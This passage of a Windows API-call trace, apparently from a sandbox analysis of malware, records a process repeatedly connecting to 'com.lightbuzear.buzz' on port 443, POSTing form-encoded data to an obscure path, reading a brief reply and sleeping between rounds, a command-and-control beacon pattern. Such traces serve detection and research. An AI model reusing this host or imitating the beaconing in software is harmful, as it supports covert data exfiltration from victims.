MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0272.440] FreeLibrary (hLibModule=0x71780000) returned 1 [0272.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bea00 | out: hHeap=0x4780000) returned 1 [0272.440] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0272.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb90 [0272.440] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0272.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0272.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0272.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0272.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0272.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0272.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0272.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0272.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0272.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0272.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f068 [0272.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0272.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edc8 [0272.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f068 | out: hHeap=0x4780000) returned 1 [0272.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0272.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edc8 | out: hHeap=0x4780000) returned 1 [0272.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ef30 [0272.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec08 [0272.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec08 | out: hHeap=0x4780000) returned 1 [0272.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0272.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0272.443] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0272.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beac8 [0272.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0272.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0272.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0272.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0272.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0272.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0272.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0272.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0272.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0272.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef18 [0272.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0272.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef60 [0272.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0272.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0272.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0272.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480edf8 [0272.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be898 [0272.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be898 | out: hHeap=0x4780000) returned 1 [0272.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0272.445] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0272.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0272.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0272.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0272.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0272.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0272.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0272.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0272.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0272.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0272.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f068 [0272.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0272.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef18 [0272.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f068 | out: hHeap=0x4780000) returned 1 [0272.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0272.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0272.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be960 [0272.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0272.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0272.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be960 | out: hHeap=0x4780000) returned 1 [0272.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beaf0 [0272.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0272.446] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bea00 [0272.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0272.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0272.447] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0272.447] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0272.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bea00 | out: hHeap=0x4780000) returned 1 [0272.448] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0272.448] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0272.448] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0272.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0272.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0272.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0272.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0272.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0272.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0272.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef60 [0272.462] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0272.462] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f068 [0272.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0272.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0272.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f068 | out: hHeap=0x4780000) returned 1 [0272.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be8e8 [0272.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0272.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0272.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0272.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47becd0 [0272.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0272.463] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be898 [0272.463] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0272.465] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0272.465] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0272.466] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0273.783] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be898 | out: hHeap=0x4780000) returned 1 [0273.783] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0273.783] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0273.784] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0273.784] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0273.784] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0273.784] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0273.784] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0273.784] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0273.784] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0273.784] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0273.784] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0273.784] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0273.784] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f068 [0273.784] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0273.784] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed80 [0273.784] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f068 | out: hHeap=0x4780000) returned 1 [0273.784] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0273.784] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed80 | out: hHeap=0x4780000) returned 1 [0273.784] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be8e8 [0273.784] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0273.784] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0273.785] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0273.785] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bebb8 [0273.785] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0273.785] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be988 [0273.785] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0273.785] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0273.786] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0273.786] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0273.786] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be988 | out: hHeap=0x4780000) returned 1 [0273.786] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0273.786] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0273.786] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0273.787] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0273.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0273.787] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0273.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0273.787] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0273.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0273.787] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0273.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f068 [0273.787] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0273.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ee58 [0273.787] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f068 | out: hHeap=0x4780000) returned 1 [0273.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0273.787] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee58 | out: hHeap=0x4780000) returned 1 [0273.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be988 [0273.787] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0273.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbda0 [0273.787] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be988 | out: hHeap=0x4780000) returned 1 [0273.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bebe0 [0273.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0273.787] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bea00 [0273.788] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0273.788] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0273.788] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0273.788] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0273.788] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bea00 | out: hHeap=0x4780000) returned 1 [0273.789] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0273.789] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0273.789] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0273.789] FreeLibrary (hLibModule=0x71570000) returned 1 [0273.789] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0273.789] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0273.789] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beac8 | out: hHeap=0x4780000) returned 1 [0273.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0273.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb90 | out: hHeap=0x4780000) returned 1 [0273.790] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8c0 | out: hHeap=0x4780000) returned 1 [0273.790] Sleep (dwMilliseconds=0x2710) [0273.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0273.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0273.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0273.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0273.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0273.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0273.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0273.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0273.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0273.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef60 [0273.803] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0273.803] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef18 [0273.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0273.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0273.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0273.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f068 [0273.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be898 [0273.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be898 | out: hHeap=0x4780000) returned 1 [0273.804] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0273.804] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8e8 [0273.804] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0273.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0273.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0273.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0273.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0273.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0273.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0273.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0273.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0273.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0273.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee58 [0273.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0273.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef60 [0273.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee58 | out: hHeap=0x4780000) returned 1 [0273.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0273.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0273.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be910 [0273.805] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0273.805] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0273.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be910 | out: hHeap=0x4780000) returned 1 [0273.806] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb90 [0273.806] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0273.806] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be988 [0273.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0273.806] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0273.806] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0273.807] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0273.807] FreeLibrary (hLibModule=0x71780000) returned 1 [0273.807] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be988 | out: hHeap=0x4780000) returned 1 [0273.807] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0273.807] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec80 [0273.808] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0273.808] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0273.808] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0273.808] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0273.808] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0273.808] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0273.808] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0273.808] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0273.808] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0273.808] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0273.808] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480edc8 [0273.808] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0273.808] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edb0 [0273.809] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edc8 | out: hHeap=0x4780000) returned 1 [0273.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0273.809] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0273.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ee28 [0273.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be898 [0273.809] 